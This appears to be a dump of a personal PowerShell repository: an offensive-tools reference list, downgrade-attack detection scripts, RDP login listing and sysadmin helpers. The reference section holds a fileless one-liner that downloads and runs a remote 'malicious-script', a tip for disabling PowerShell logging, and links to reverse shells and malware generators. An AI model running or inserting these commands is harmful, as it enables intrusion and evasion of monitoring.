[Invoke-DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation) 58 | 59 | ## Exploitation 60 | - [Malgen](https://github.com/cmsteffen-code/malgen) - Craft obfuscated, fileless PowerShell malware. 61 | 62 | ## Framewoks 63 | - [Empire](https://github.com/BC-SECURITY/Empire) - Empire is a PowerShell and Python 3.x post-exploitation framework. 64 | - [Nishang](https://github.com/samratashok/nishang) - Offensive PowerShell for red team, penetration testing and offensive security. 65 | - [PowerSploit/byt3bl33d3r](https://github.com/byt3bl33d3r/PowerSploit) - A PowerShell Post-Exploitation Framework 66 | - [PowerSploit/PowerShellMafia](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell Post-Exploitation Framework. 67 | - [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) 68 | - [SharpView](https://github.com/tevora-threat/SharpView) - C# implementation of harmj0y's PowerView. 69 | 70 | ## Persistence 71 | - Task schedule standard storing paths 72 | ````powershell 73 | C:\Windows\System32\Tasks 74 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks 75 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree 76 | ```` 77 | 78 | ## Network 79 | - [Get-WlanEnterprisePassword](https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html) 80 | - [Invoke-SocksProxy](https://github.com/p3nt4/Invoke-SocksProxy) - Socks proxy, and reverse socks server using powershell. 81 | - Reverse-shell 82 | - [PowerShell-reverse-shell](https://github.com/MartinSohn/PowerShell-reverse-shell) - Reverse TCP shell in PowerShell for fun. Made in spring 2020 with inspiration from (and a few fixes to) samratashok/nishang Invoke-PowerShellTcp.ps1 and https://cyberwardog.blogspot.com/2016/08/poweshell-encrypt-tcp-client-server.html . 83 | 84 | ## Obfuscation, evaision and stealth 85 | - Disable powershell logging by set value to `0` in `HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription` 86 | - File less attacks 87 | ````powershell 88 | powershell -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.com/malicious-script')" 89 | ```` 90 | - [Invoke-DOSfuscation](https://github.com/danielbohannon/Invoke-DOSfuscation) - Cmd.exe Command Obfuscation Generator & Detection Test Harness. 91 | - [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - PowerShell Obfuscator. 92 | - [NoPowerShell](https://github.com/bitsadmin/nopowershell) - PowerShell rebuilt in C# for Red Teaming purposes 93 | 94 | #### Writeable paths
95 | C:\Windows\Tasks 96 | C:\Windows\Temp 97 | C:\windows\tracing 98 | C:\Windows\Registration\CRMLog 99 | C:\Windows\System32\FxsTmp 100 | C:\Windows\System32\com\dmp 101 | C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 102 | C:\Windows\System32\spool\PRINTERS 103 | C:\Windows\System32\spool\SERVERS 104 | C:\Windows\System32\spool\drivers\color 105 | C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter 106 | C:\Windows\SysWOW64\FxsTmp 107 | C:\Windows\SysWOW64\com\dmp 108 | C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter 109 | C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System 110 | -------------------------------------------------------------------------------- /Security/Check-Downgrade-Attacks.ps1: -------------------------------------------------------------------------------- 1 | #Sjekk etter tidligere hendelser som tyder på innlasting av lavere PowerShell versjoner 2 | 3 | #For å kjøre kommandoer via en lavere versjon kan man skrive følgende: 4 | # PowerShell -Version 2 -Command KOMMANDOHER 5 | 6 | Get-WinEvent -LogName "Windows PowerShell" | 7 | Where-Object Id -eq 400 | 8 | Foreach-Object { 9 | $version = [Version] ($_.Message -replace '(?s).*EngineVersion=([\d\.]+)*.*','$1') 10 | if($version -lt ([Version] "5.0")) { $_ } 11 | } 12 | -------------------------------------------------------------------------------- /Security/Check-lower-PS-versions.ps1: -------------------------------------------------------------------------------- 1 |  2 | #powershell.exe -version 2 -command ls 3 | #powershell.exe -version 4 -command dir 4 | 5 | #Checks if there actually exists PS logs 6 | if ( $(Get-EventLog -LogName "Windows PowerShell") -eq $null ) { 7 | 8 | Write-Host "`nAborting - no PowerShell logs found`n" -Fore Red 9 | 10 | } Else { 11 | $LocalPSVersion = $PSVersionTable.PSVersion 12 | Write-Host "`nInstalled PowerShell version: " -NoNewline -Fore Cyan 13 | Write-Host $PSVersionTable.PSVersion "`n" 14 | 15 | #Egenskaper: Get-EventLog -LogName "Windows PowerShell" | Get-Member 16 | 17 | Get-WinEvent -LogName "Windows PowerShell" | Where-Object Id -eq 400 | 18 | Foreach-Object { 19 | 20 | $version = [Version] ($_.Message -replace '(?s).*EngineVersion=([\d\.]+)*.*','$1') 21 | 22 | #Formating output to contain command run 23 | $Command = $_.Message 24 | $Command = $Command.Trim("HostApplication="," ") 25 | 26 | if($version -lt $LocalPSVersion) { 27 | #$_; 28 | If ($_.UserName -eq $null) {$Username = ""} Else {$Username = $_.UserName} 29 | 30 | Write-Host "Time: " -Fore Cyan -NoNewline; Write-Host $_.TimeCreated -NoNewline 31 | Write-Host " User: " -Fore Cyan -NoNewline; Write-Host $Username -NoNewline 32 | Write-Host " version: " -Fore Cyan -NoNewline; Write-Host $version -NoNewline 33 | Write-Host " Message: " -Fore Cyan -NoNewline; #Write-Host $_.Message -fore Yellow 34 | Write-Host "Application & command: " -Fore Cyan -NoNewline; Write-Host $Command "`n" 35 | } 36 | #Read-Host 37 | } 38 | 39 | } 40 | 41 | -------------------------------------------------------------------------------- /Security/Convert-SID-To-Username.ps1: -------------------------------------------------------------------------------- 1 | Function Convert-SID-To-Username($SID) { 2 | 3 | #$SID may be 'S-1-5-21-1924530255-1943933946-939161726-500' 4 | 5 | $objSID = New-Object System.Security.Principal.SecurityIdentifier($SID) 6 | $objUser = $objSID.Translate([System.Security.Principal.NTAccount]) 7 | Write-Host "`n Username is: $objUser.Value" -Fore Yellow 8 | } 9 | #Syntax: Convert-SID-To-Username "S-1-5-21-1924530255-1943933946-939161726-500" 10 | -------------------------------------------------------------------------------- /Security/Encrypt-String.ps1: -------------------------------------------------------------------------------- 1 | https://codeforcontent.com/blog/using-aes-in-powershell/ 2 | 3 | #Encrypt string 4 | #Decrypt String 5 | -------------------------------------------------------------------------------- /Security/List-RDP-logins.ps1: -------------------------------------------------------------------------------- 1 | #Sourcecode er hentet fra: https://gallery.technet.microsoft.com/scriptcenter/Collect-RDP-logon-entries-dc3e19d0 2 | 3 | #Bruk: 4 | # Get-OSCRDPIPaddress 5 | # Get-OSCRDPIPaddress 129.241.1.2 6 | # Get-OSCRDPIPaddress 127.0.0.1 7 | 8 | #--------------------------------------------------------------------------------- 9 | #The sample scripts are not supported under any Microsoft standard support 10 | #program or service. The sample scripts are provided AS IS without warranty 11 | #of any kind. Microsoft further disclaims all implied warranties including, 12 | #without limitation, any implied warranties of merchantability or of fitness for 13 | #a particular purpose. The entire risk arising out of the use or performance of 14 | #the sample scripts and documentation remains with you. In no event shall 15 | #Microsoft, its authors, or anyone else involved in the creation, production, or 16 | #delivery of the scripts be liable for any damages whatsoever (including, 17 | #without limitation, damages for loss of business profits, business interruption, 18 | #loss of business information, or other pecuniary loss) arising out of the use 19 | #of or inability to use the sample scripts or documentation, even if Microsoft 20 | #has been advised of the possibility of such damages 21 | #--------------------------------------------------------------------------------- 22 | 23 | Function Get-OSCRDPIPaddress 24 | { 25 | <# 26 | .SYNOPSIS 27 | Get-OSCRDPIPaddress is an advanced function which can be list RDP IP address. 28 | 29 | .DESCRIPTION 30 | Get-OSCRDPIPaddress is an advanced function which can be list RDP IP address. 31 | 32 | .PARAMETER 33 | Specifies the computers on which the command runs. The default is the local computer. 34 | 35 | .PARAMETER 36 | Specifies a user account that has permission to perform this action. 37 | .PARAMETER 38 | lists records before the specified day. 39 | .PARAMETER 40 | lists records after the specified day. 41 | 42 | .EXAMPLE 43 | C:\PS> Get-OSCRDPIPaddress -before 4/2/2013 44 | 45 | This command lists all RDP IP address records before 4/2/2013 in local machine. 46 | 47 | .EXAMPLE 48 | C:\PS> $cre = Get-Credential 49 | C:\PS> Get-OSCFolderPermission -ComputerName "abcd0123" -Credential $cre -After 4/2/2013 50 | 51 | This command lists all RDP IP address records after 4/2/2013 in computer "abcd0123" 52 | #> 53 | [CmdletBinding()] 54 | Param 55 | ( 56 | [Parameter(Mandatory=$false,Position=0)] 57 | [String]$ComputerName=$Env:COMPUTERNAME, 58 | [Parameter(Mandatory=$false,Position=1)] 59 | [System.Management.Automation.PsCredential]$Credential, 60 | [Parameter(Mandatory=$false,Position=2)] 61 | [Datetime]$Before, 62 | [Parameter(Mandatory=$false,Position=3)] 63 | [Datetime]$After 64 | ) 65 | Try 66 | { 67 | $result = @() 68 | If($Credential) 69 | { 70 | $LogOnEvents = Get-WinEvent -ComputerName $ComputerName -Credential $Credential -filterHashtable @{LogName='Security'; Id=4624; Level=0} | Where-Object{ $_.Properties[8].Value -eq 10} 71 | } 72 | Else 73 | { 74 | $LogOnEvents = Get-WinEvent -filterHashtable @{LogName='Security'; Id=4624; Level=0} | Where-Object{ $_.Properties[8].Value -eq 10} 75 | } 76 | If($LogOnEvents) 77 | { 78 | Foreach($Event in $LogOnEvents ) 79 | { 80 | $UserName = $Event.Properties[5].value 81 | $Ip = $Event.Properties[18].value 82 | $logObj = New-Object PSobject -Property @{ComputerName = $ComputerName;Time = $Event.TimeCreated; UserName = $UserName ;ClientIPAddress = $Ip } 83 | $result = $result + $logObj 84 | } 85 | if($Before -and $After) 86 | { 87 | $result | Where-Object { ($_.Time -le $Before) -and ($_.Time -ge $After) } 88 | } 89 | Else 90 | { 91 | If($Before) 92 | { 93 | $result | Where-Object {$_.Time -le $Before} 94 | } 95 | Elseif($After) 96 | { 97 | $result | Where-Object {$_.Time -ge $After} 98 | } 99 | Else 100 | { 101 | $result 102 | } 103 | } 104 | 105 | } 106 | } 107 | Catch 108 | { 109 | Write-Error $_ 110 | } 111 | 112 | } 113 | -------------------------------------------------------------------------------- /Security/README.md: -------------------------------------------------------------------------------- 1 | # Security 2 | 3 | - [Babel-Shellfish](https://github.com/OmerYa/Babel-Shellfish) - Babel-Shellfish deobfuscates and scans Powershell scripts on real-time right before each line execution. 4 | - [Detect-Log4Shell](https://github.com/ValtteriL/Detect-Log4Shell) - Powershell script to check log files for Log4Shell exploitation 5 | - [Generate-ComplexPassword](https://github.com/BlueTeamSteve/Generate-ComplexPassword) - Powershell script to generate a complex password. 6 | - [PoShEvents](https://github.com/thedavecarroll/PoShEvents) - PowerShell module to query Windows Event Logs and write events with structured EventData or UserData. 7 | - [Windows-Security-Assessment](https://github.com/haim-n/Windows-Security-Assessment) - Assess Windows OS for security misconfigurations and hardening opportunities. 8 | -------------------------------------------------------------------------------- /SysAdmin/Check-Services.ps1: -------------------------------------------------------------------------------- 1 | # Author: Am0rphous 2 | # Date: 2021 3 | # Intention: Write a primitive script that checks local services. 4 | # This script is only halfway done 5 | # There is a mix of norwegian words and sentences 6 | 7 | 8 | function PrepareModules { 9 | If ( $(Get-Module -Name "PendingReboot") -eq $null) { 10 | Write-Host "`n Vent litt, må bare installere noen moduler slik at alt virker i scriptet. :-)" -Fore Yellow 11 | Try { 12 | Install-Module -Name PendingReboot -Force -ErrorAction SilentlyContinue -Confirm:$False 13 | if ($?) { 14 | Import-Module PendingReboot 15 | If ($?) { 16 | Write-Host "`nSånn! Da skal alt være i orden. Går videre.." -Fore Green 17 | } 18 | } 19 | } Catch { 20 | Write-Host "`n Woops! Jeg greide ikke å installere 'PendingReboot'." -Fore Yellow 21 | Write-Host " Jeg kan derfor ikke sjekke om datamaskinen din trenger en restart. :-)" -fore Yellow 22 | } 23 | } 24 | } 25 | 26 | function VisOppetid { 27 | $OS = Get-WmiObject win32_operatingsystem 28 | $Oppetid = (Get-Date) - ($OS.ConvertToDateTime($OS.lastbootuptime)) 29 | $Oppetid = "" + $Oppetid.Days + " dager, " + $Oppetid.Hours + " timer, " + $Oppetid.Minutes + " minutter" 30 | Write-Host " Oppetid: " -NoNewline -Fore Cyan; Write-Host $Oppetid 31 | } 32 | 33 | ######## Tjenester som brukes på flere servere: 34 | 35 | #wuauserv - Windows Update 36 | #Lager en funksjon av denne for å formatere outputen på en mer brukervennlig måte 37 | Function CheckServiceWindowsUpdates { 38 | $WindowsUpdateService = Get-Service -Name "wuauserv" 39 | if ( $WindowsUpdateService.Status -eq "Stopped") { 40 | Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " Windows Update " -NoNewline 41 | Write-Host "kjører ikke" -Fore Red 42 | } Elseif ( $WindowsUpdateService.Status -eq "Running"){ 43 | Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " Windows Update " -NoNewline 44 | Write-Host "kjører" -Fore Green 45 | } 46 | } 47 | 48 | #Sjekker om en tjeneste kjører 49 | Function CheckService ($ServiceName) { 50 | If ( $(Get-Service -name $ServiceName) -eq $null) { 51 | Write-Host "`n Fant ikke tjenesten '$ServiceName'" -Fore Red 52 | } Else { 53 | $Service = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue 54 | if ( $Service.Status -eq "Stopped") { 55 | Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " $Service" -NoNewline 56 | Write-Host " kjører ikke" -Fore Red 57 | 58 | Try { 59 | Write-Host " `n Prøver å starte tjenesten, vent litt .." -Fore Yellow 60 | Start-Service $ServiceName; Sleep 4; #Starter tjenesten og venter 4 sekunder 61 | $Service.Refresh() 62 | if ($Service.Status -eq 'Running') { 63 | Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " $Service" -NoNewline 64 | Write-Host " kjører" -Fore Green 65 | } 66 | } Catch { 67 | Write-Host "`n Woops! Det ser ut til at PowerShell ikke greide å starte tjenesten. Følgende feilmelding ble gitt: " -Fore Yellow 68 | Write-Host $Error 69 | Write-Host "`n Vi fortsetter scriptet.." -fore Green 70 | } 71 | } Elseif ( $Service.Status -eq "Running"){ 72 | Write-Host " Tjenesten: " -NoNewline -Fore Cyan; Write-Host " $Service" -NoNewline 73 | Write-Host " kjører" -Fore Green 74 | } 75 | } 76 | } 77 | 78 | PrepareModules #importerer, eventuelt laster ned og installerer moduler som kreves i scriptet 79 | 80 | Write-Host "`n ############# Statussjekk server #############" -Fore Cyan 81 | 82 | If ( $(Test-PendingReboot -SkipConfigurationManagerClientCheck | Select -ExpandProperty IsRebootPending) -eq $true) { 83 | Write-Host "`n " -Fore Cyan -NoNewline; Write-Host "Server trenger å restartes!" -Fore Red 84 | } 85 | 86 | Write-Host "`n Statussjekk: " -NoNewline -Fore Cyan; Write-Host "Dell Workstation 1 (192.168.1.20)" 87 | VisOppetid 88 | 89 | Write-Host "" 90 | 91 | CheckService ol; $servisename ="" 92 | CheckService "Teamviewer" #Sjekker om Teamviewer kjører på maskinen 93 | CheckServiceWindowsUpdates 94 | 95 | ###################### Slutt på Sjekk av SERVER - 192.168.1.20 ###################### 96 | ########################################################################################### 97 | 98 | Write-Host "" 99 | -------------------------------------------------------------------------------- /SysAdmin/Clean-Menu.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Multiple lines of info about your menu script. 3 | Author: 4 | Date: 5 | 6 | To do: 7 | #> 8 | 9 | function CatchErrorMessage { 10 | # `n gives a new line 11 | # `t makes a tabulator space 12 | # $_ shows the error message 13 | # 'Fore' is short for 'ForegroundColor' 14 | Write-Host "`t$_`n" -Fore Red 15 | } 16 | 17 | Function Prompt_reload_menu { 18 | Read-Host "`tPress 'enter'to go back" 19 | $menuOption = 0 #It's important to reset variable 20 | LoadMenu 21 | } 22 | 23 | Function Reload_menu_now { 24 | $menuOption = 0 #It's important to reset variable 25 | LoadMenu 26 | } 27 | 28 | Function LoadMenu { 29 | 30 | [int] $menuOption = 0 #Resets the menuoptions for each time the menu loads 31 | $t = "`t`t" #Each 't' makes a tab space from the left 32 | $nt = "`n`t`t" #Makes a new line and two tabulator spaces 33 | [int] $LastOption = 6 #Total number of options in the menu 34 | [string] $MenuBar = "`n=========== PowerShell Menu for SysAdmins ===========" 35 | 36 | #Foreach option in the menu, the script checks if the user has chosen 37 | #a value less than 1 or an option greater than the last menu option. 38 | #If the value is outside of the menu options, the code in 'default' will 39 | #excecute. 40 | 41 | while ( $menuOption -lt 1 -or $menuOption -gt $LastOption ) { 42 | CLS #Clears creen 43 | Write-Host $MenuBar -Fore Magenta 44 | Write-Host "`n`tgithub.com/Am0rphous" 45 | Write-Host "$nt`Choose between these options:" -Fore Cyan 46 | Write-host "$nt`1. " -NoNewline -Fore Cyan; Write-Host "Option one" 47 | Write-host "$nt`2. " -NoNewline -Fore Cyan; Write-Host "Option two" 48 | Write-host "$nt`3. " -NoNewline -Fore Cyan; Write-Host "Option three" 49 | Write-host "$nt`4. " -NoNewline -Fore Cyan; Write-Host "Option four" 50 | Write-host "$nt`5. " -NoNewline -Fore Cyan; Write-Host "Option five" 51 | Write-host "$nt`6. " -NoNewline -Fore Cyan; Write-Host "Exit" 52 | 53 | #Gets input which is supposed to an integer value from the user 54 | [Int] $menuOption = Read-Host "`n`tOption" 55 | if ( $menuOption -lt 1 -or $menuOption -gt $LastOption ) { 56 | Write-Host "$nt`Please choose a number in the menu" -Fore Red 57 | Start-sleep 2 #Script pauses for two seconds, so the user has time to read the error message 58 | } 59 | 60 | Write-Host "" #Shows the feedback to the user one line further down 61 | } 62 | 63 | Switch ( $menuOption ) { 64 | 65 | 1 { #Option 1 - whatever 66 | 67 | Try { 68 | Write-Host `t"Running your code now .." `n 69 | Prompt_reload_menu 70 | } Catch { CatchErrorMessage } 71 | 72 | } #Option 1 - whatever 73 | 74 | 2 { #Option 2 - whatever 75 | 76 | Try { 77 | Write-Host `t"Running your code now .." `n 78 | } Catch { CatchErrorMessage } 79 | 80 | Prompt_reload_menu 81 | 82 | } #Option 2 - whatever 83 | 84 | 3 { #Option 3 - whatever 85 | 86 | Try { 87 | Write-Host `t"Running your code now .." `n 88 | } 89 | Catch { CatchErrorMessage } 90 | 91 | Prompt_reload_menu 92 | 93 | } #Option 3 - whatever 94 | 95 | 4 { #Option 4 - whatever 96 | 97 | Try { 98 | Write-Host `t"Running your code now .." `n 99 | } 100 | Catch { CatchErrorMessage } 101 | 102 | Prompt_reload_menu 103 | 104 | } #Option 4 - whatever 105 | 106 | 5 { #Option 5 - whatever 107 | 108 | Try { 109 | Write-Host `t"Running your code now .." `n 110 | } 111 | Catch { CatchErrorMessage } 112 | 113 | Prompt_reload_menu 114 | 115 | } #Option 5 - whatever 116 | 117 | default { #Code to execute if option number 6 is chosen 118 | Write-Host "`t __________________ " 119 | Write-Host "`t< Good bye >" 120 | Write-Host "`t ------------------" 121 | Write-Host "`t \ ^__^" 122 | Write-Host "`t \ (oo)\_______" 123 | Write-Host "`t (__)\ )\/\" 124 | Write-Host "`t ||----w |" 125 | Write-Host "`t__v_v___v_____v_" -Fore Green -NoNewline 126 | Write-Host "||" -NoNewline 127 | Write-Host "_____" -Fore Green -NoNewline 128 | Write-Host "||" -NoNewline 129 | Write-Host "__`n" -Fore Green 130 | 131 | exit #Exits script 132 | 133 | } #Code to execute if option number 6 is chosen 134 | 135 | }#End switch 136 | 137 | }#End function 138 | 139 | LoadMenu #Calls for the menu 140 | -------------------------------------------------------------------------------- /SysAdmin/Connect-Shared-Folder.ps1: -------------------------------------------------------------------------------- 1 | #Script som kobler til en hjemmekatalog 2 | #31.01.19 Am0rphous 3 | 4 | #Skriv inn brukernavnet ditt under 5 | [string] $brukernavn = "navn" 6 | 7 | #Sjekker om script kan kjøres uten å sette ExecutionPolicy 8 | if ($(Get-ExecutionPolicy) -match "Restricted") { 9 | Try { 10 | Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted 11 | } Catch { 12 | $ErrorMessage = $_.Exception.Message #Henter feilmelding om det oppstår en 13 | Write-Host $ErrorMessage #Viser feilmeldingen til brukeren 14 | } 15 | } 16 | 17 | #Koden under henter stien + brukernavnet på datamaskinen. Brukernavn på datamaskinen kan variere 18 | #så derfor brukes den 'generelle' kommandoen for å hente sti til skrivebordet. 19 | $DesktopPath = [Environment]::GetFolderPath("Desktop") 20 | 21 | #Lagrer hjemmekatalogen som en variabel 22 | [string] $StiHjemmeKatalog = "\\home.corp.com" 23 | 24 | #Prøver å finne hjemmekatalog for å se om den er tilkoblet allerede 25 | $SMB_folders = Get-SmbMapping | ` 26 | Select -Property RemotePath,Status | ` 27 | Where-Object -Property RemotePath -Match $StiHjemmeKatalog | ` 28 | Where-Object -Property Status -eq "OK" 29 | 30 | Function LagSnarveiSkrivebord() { 31 | $path = $DesktopPath 32 | $wshshell = New-Object -ComObject WScript.Shell 33 | $desktop = [System.Environment]::GetFolderPath('Desktop') 34 | $lnk = $wshshell.CreateShortcut($desktop+"\Hjemmekatalog $brukernavn.lnk") 35 | $lnk.TargetPath = "$StiHjemmeKatalog\$brukernavn" 36 | $lnk.Save() 37 | } 38 | 39 | #Funksjon som åpner hjemmekatalogen for brukeren 40 | Function OpenFolder() { 41 | Invoke-Item -Path "$StiHjemmeKatalog\$brukernavn" 42 | } 43 | 44 | Clear-Host 45 | 46 | #Sjekker om hjemmekatalogen eksisterer fra før 47 | if ($SMB_folders) { 48 | Write-Host "`nDet ser ut til at hjemmekatalogen allerede er tilkoblet!" -Fore Green 49 | Write-Host "`nÅpner mappa for deg... Farvell ツ" -Fore Yellow 50 | LagSnarveiSkrivebord | Out-Null 51 | OpenFolder 52 | 53 | } else { 54 | #Hvis hjemmekatalogen ikke eksisterer prøver vi å legge den til 55 | 56 | Write-Host "`nPrøver å legge til hjemmekatalogen..." -Fore Yellow 57 | Write-Host "`nVennligst skriv inn passordet til kontoen for å koble til:" -Fore Yellow 58 | 59 | Try { 60 | New-PSDrive -Name x ` 61 | -PSProvider "FileSystem" ` 62 | -Root "$StiHjemmeKatalog\$brukernavn" ` 63 | -Description "Hjemmekatalog Corporation" ` 64 | -Credential (Get-Credential "win-domain-com\$brukernavn") 65 | #-ErrorAction SilentlyContinue ` 66 | #| Out-Null 67 | 68 | } Catch { 69 | $ErrorMessage = $_.Exception.Message #Henter feilmelding om det oppstår en 70 | Write-Host "`n$ErrorMessage" -Fore Red #Viser feilmeldingen til brukeren 71 | } 72 | 73 | if ($?) { 74 | Write-Host "`nSuksess! Hjemmekatalogen '$StiHjemmeKatalog\$brukernavn' er tilkoblet!" -Fore Green 75 | LagSnarveiSkrivebord | Out-Null 76 | if ($?) { 77 | Write-Host "`nDet ble opprettet en snarvei på skrivebordet! Farvell ツ " -Fore Green 78 | OpenFolder 79 | } 80 | } Else { 81 | Test-Connection -ComputerName "home.corp.com" -Count 2 -ErrorAction SilentlyContinue | Out-Null 82 | 83 | if ($? -eq $false) { 84 | Write-Host "`nMaskinen din når ikke frem til serveren." -Fore Red 85 | Write-Host "`nSjekk om du har Internett, eventuelt prøv med VPN." -Fore Yellow 86 | } 87 | Write-Host "`nGreide ikke å koble til hjemmekatalogen! Scriptet avsluttes.. Farvell ツ" -Fore Red 88 | 89 | } 90 | } 91 | 92 | #Venter noen sekunder før scriptet avsluttes 93 | Sleep 4 94 | -------------------------------------------------------------------------------- /SysAdmin/Cool-Down-and-Sleep.ps1: -------------------------------------------------------------------------------- 1 | #I used this after gaming, to cool down the computer and make it auto sleep. 2 | #That way I didn't need to sit by the computer and wait for the GPU to cool down and then hit sleep. 3 | 4 | function Wait-Computer 5 | { 6 | Add-Type -Assembly System.Windows.Forms 7 | $state = [System.Windows.Forms.PowerState]::Suspend 8 | [System.Windows.Forms.Application]::SetSuspendState($state, $false, $false) | Out-Null 9 | } 10 | function Wait-Computer {} 11 | 12 | sleep -s 180 #Equals 3 minutes 13 | 14 | Wait-Computer 15 | -------------------------------------------------------------------------------- /SysAdmin/Download-File.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | Various ways to download files with powershell 3 | #> 4 | 5 | #source: https://github.com/warferik/WindowsTLS12/blob/master/WinRM-Mem.ps1 6 | Function Download-File($url, $path) { 7 | Write-Verbose -Message "downloading url '$url' to '$path'" 8 | $client = New-Object -TypeName System.Net.WebClient 9 | $client.DownloadFile($url, $path) 10 | } 11 | 12 | #source: https://www.thewindowsclub.com/download-file-using-windows-powershell 13 | #$client = new-object System.Net.WebClient 14 | #$client.DownloadFile(“Download Link”,“File Destination\file name.file extension”) 15 | $client = new-object System.Net.WebClient 16 | $client.DownloadFile(“http://thewindowsclub.thewindowsclub.netdna-cdn.com/wp-content/upload/2016/Windows-Explorer-Process-Task-Manager-600x405.png”,“C:\Users\Digdarshan\Pictures\TWC\Task-Manager.png”) 17 | 18 | # requireing credentials 19 | $client = new-object System.Net.WebClient 20 | $client.Credentials = Get-Credential 21 | $client.DownloadFile(“http://thewindowsclub.thewindowsclub.netdna-cdn.com/wp-content/upload/2016/Windows-Explorer-Process-Task-Manager-600x405.png”,“C:\Users\Digdarshan\Pictures\TWC\Task-Manager.png”) 22 | 23 | Invoke-WebRequest -outfile https://urltofile.com/file.zip filenameyouwant.zip 24 | 25 | $source = “http://thewindowsclub.thewindowsclubco.netdna-cdn.com/wp-content/uploads/2016/06/Copy-Download-Link.png” 26 | $destination = “C:UsersLDORONYDesktop1.png” 27 | $client = new-object System.Net.WebClient 28 | $client.DownloadFile($source, $destination) 29 | -------------------------------------------------------------------------------- /SysAdmin/README.md: -------------------------------------------------------------------------------- 1 | # SySAdmin 2 | 3 | - [Carbon](http://get-carbon.org/) - "Carbon is a PowerShell module for automating the configuration of computers running Windows 7, 8, 2008, and 2012." 4 | - [Posh-SSH](https://github.com/darkoperator/Posh-SSH) - PowerShell Module for automating tasks on remote systems using SSH 5 | - [HTTP Server](https://github.com/zh54321/PowerShell_HttpServer) - Simple PowerShell HTTP Server (no dependencies, single file, PowerShell 5.1/7) 6 | 7 | ## PowerShell Remoting Setup 8 | ````powershell 9 | Enable-PSRemoting -Force #Enabling PSRemoting 10 | set-item wsman:\localhost\Client\TrustedHosts -value * #Enable access from all IPs (not ideal in a work environment) 11 | get-item wsman:\localhost\Client\TrustedHosts ##Check of TrustedHosts 12 | Set-NetConnectionProfile -NetworkCategory Private #Change of network profile 13 | ```` 14 | 15 | ## What process is using this port 16 | ````powershell 17 | #Choosing port 8080 as an example 18 | Get-Process -Id (Get-NetTCPConnection -LocalPort 8080).OwningProcess 19 | 20 | #Choosing process with ID 7324 as an example below 21 | Get-Process -Id 7324 | Select-Object -ExpandProperty Modules | Select-Object -ExpandProperty FileName | Get-Unique 22 | ```` 23 | -------------------------------------------------------------------------------- /SysAdmin/Run-Process.ps1: -------------------------------------------------------------------------------- 1 | #source https://github.com/warferik/WindowsTLS12/blob/master/WinRM-Mem.ps1 2 | 3 | 4 | Function Run-Process($executable, $arguments) { 5 | $process = New-Object -TypeName System.Diagnostics.Process 6 | $psi = $process.StartInfo 7 | $psi.FileName = $executable 8 | $psi.Arguments = $arguments 9 | Write-Verbose -Message "starting new process '$executable $arguments'" 10 | $process.Start() | Out-Null 11 | 12 | $process.WaitForExit() | Out-Null 13 | $exit_code = $process.ExitCode 14 | Write-Verbose -Message "process completed with exit code '$exit_code'" 15 | 16 | return $exit_code 17 | } 18 | 19 | -------------------------------------------------------------------------------- /SysAdmin/Uptime.ps1: -------------------------------------------------------------------------------- 1 | function Uptime { 2 | $OS = Get-WmiObject win32_operatingsystem 3 | $Uptime = (Get-Date) - ($OS.ConvertToDateTime($OS.lastbootuptime)) 4 | $Uptime = "" + $Uptime.Days + " days, " + $Uptime.Hours + " hours, " + $Uptime.Minutes + " minutes" 5 | Write-Host "`n Uptime: " -NoNewline -Fore Cyan; Write-Host $Uptime 6 | } 7 | 8 | Uptime 9 | -------------------------------------------------------------------------------- /Test-PendingReboot.ps1: -------------------------------------------------------------------------------- 1 | function Test-PendingReboot { 2 | #Adapted from https://gist.github.com/altrive/5329377 3 | #Based on http://gallery.technet.microsoft.com/scriptcenter/Get-PendingReboot-Query-bdb79542 4 | # Source: https://ilovepowershell.com/2015/09/10/how-to-check-if-a-server-needs-a-reboot/ 5 | 6 | if (Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending" -EA Ignore) { return $true } 7 | if (Get-Item "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired" -EA Ignore) { return $true } 8 | if (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name PendingFileRenameOperations -EA Ignore) { return $true } 9 | 10 | try { 11 | $util = [wmiclass]"\\.\root\ccm\clientsdk:CCM_ClientUtilities" 12 | $status = $util.DetermineIfRebootPending() 13 | if(($status -ne $null) -and $status.RebootPending){ 14 | return $true 15 | } 16 | }catch{} 17 | return $false 18 | } 19 | -------------------------------------------------------------------------------- /TimeTrack-Specific-Software-Openings.ps1: -------------------------------------------------------------------------------- 1 | <#Primitive script used to test how long time a specific program need to be opened. 2 | VLC and Windows Media Player is used as examples, but any program may be used. 3 | Modern servers will have a close average time, while old and unstable servers will vary more.#> 4 | 5 | #Testing VLC or Windows Media Player? 6 | [string] $ProgramNavn = "vlc" 7 | #[string] $ProgramNavn = "wmplayer" 8 | 9 | # Windows 7 paths: 10 | Set-Location 'C:\Program Files\VideoLAN\VLC\' 11 | #Set-Location 'C:\Program Files\Windows Media Player\' 12 | 13 | #Windows 10 paths: 14 | #Set-Location 'C:\Program Files (x86)\VideoLAN\VLC\' 15 | #Set-Location 'C:\Program Files\Windows Media Player\' 16 | 17 